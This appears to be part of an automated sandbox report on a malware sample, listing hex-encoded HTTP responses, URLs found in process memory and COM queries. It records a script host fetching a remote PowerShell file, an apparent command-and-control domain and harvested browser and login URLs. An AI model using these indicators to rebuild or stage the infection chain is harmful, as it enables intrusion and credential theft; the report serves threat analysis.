74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:21:02 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:21:04 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:21:07 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66

Source: powershell.exe, 00000001.00000002.1737883956.000002409007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1709755523.0000024081BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1709755523.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1709755523.0000024081BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: W4ja93oMuuBdSP.exe, 0000000C.00000002.2896359779.0000000005619000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.lifesentials.life
Source: W4ja93oMuuBdSP.exe, 0000000C.00000002.2896359779.0000000005619000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.lifesentials.life/ai0p/
Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.1709755523.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: sxstrace.exe, 00000008.00000002.2897094550.00000000073D0000.00000004.00000800.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895521873.000000000543A000.00000004.10000000.00040000.00000000.sdmp, W4ja93oMuuBdSP.exe, 0000000C.00000002.2894902726.00000000039EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://down-sz.trafficmanager.net/?hh=
Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wscript.exe, 00000000.00000002.1762829492.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761838105.0000023837FC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762094087.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761581136.0000023836038000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe
Source: wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/
Source: wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/gn
Source: wscript.exe, 00000000.00000003.1760985865.000002383603E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762330077.0000023837DB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1654347834.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762094087.0000023836020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761639846.0000023835FFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761358334.0000023837DBF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761485798.0000023837DB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761405485.00000238361BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762142281.0000023836010000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762094087.000002383602D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761581136.0000023836025000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763091389.00000238360A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762348747.0000023837D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1760902166.000002383609F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762399499.0000023837DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761373232.0000023837D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762367499.0000023837DB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761581136.000002383602D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761046609.0000023836047000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761838105.0000023837FC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1654525933.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/p53ou1.ps1
Source: wscript.exe, 00000000.00000002.1763091389.00000238360A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1760902166.000002383609F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/p53ou1.ps1K
Source: wscript.exe, 00000000.00000003.1760985865.000002383603E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1762922730.0000023836053000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761200387.0000023836052000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761046609.0000023836047000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761123761.000002383604D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/p53ou1.ps1f:CreateObject
Source: wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/p53ou1.ps1h
Source: wscript.exe, 00000000.00000003.1654347834.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762348747.0000023837D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761373232.0000023837D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1654525933.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1654610745.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763266792.0000023837D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/p53ou1.ps1u
Source: wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/p53ou1.ps1~
Source: wscript.exe, 00000000.00000002.1762829492.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761838105.0000023837FC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762094087.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761581136.0000023836038000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe;
Source: powershell.exe, 00000001.00000002.1709755523.0000024081BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: sxstrace.exe, 00000008.00000002.2893591129.000000000089B000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2893591129.0000000000875000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sxstrace.exe, 00000008.00000002.2893591129.000000000089B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sxstrace.exe, 00000008.00000002.2893591129.0000000000875000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sxstrace.exe, 00000008.00000002.2893591129.0000000000875000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: sxstrace.exe, 00000008.00000002.2893591129.0000000000875000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sxstrace.exe, 00000008.00000002.2893591129.000000000089B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sxstrace.exe, 00000008.00000002.2893591129.0000000000875000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sxstrace.exe, 00000008.00000003.2036440767.0000000007659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000001.00000002.1737883956.000002409007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: x.exe.1.dr, -B--VL\lpU0sa--hVq3-t1E--.cs	Long String: Length: 382988
Source: 1.2.powershell.exe.2409068bb78.0.raw.unpack, -B--VL\lpU0sa--hVq3-t1E--.cs	Long String: Length: 382988

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}			Jump to behavior

